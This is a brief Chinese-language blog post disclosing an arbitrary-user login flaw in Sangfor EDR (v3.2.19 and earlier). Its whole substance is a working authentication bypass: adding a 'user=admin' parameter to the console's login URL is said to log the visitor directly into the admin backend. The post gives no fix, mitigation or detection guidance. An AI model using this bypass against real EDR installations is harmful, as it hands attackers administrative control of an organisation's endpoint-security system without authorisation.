深信服EDR(<=v3.2.19)任意用户登录漏洞

  • A+
所属分类:安全文章 安全漏洞

漏洞详情

访问一下深信服EDR,显示登陆界面

https://IP:PORT/ui/login.php

深信服EDR(<=v3.2.19)任意用户登录漏洞


此时我们把URL改成如下,即可直接登陆后台。注:该用户名须存在

https://IP:PORT/ui/login.php?user=admin

深信服EDR(<=v3.2.19)任意用户登录漏洞


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: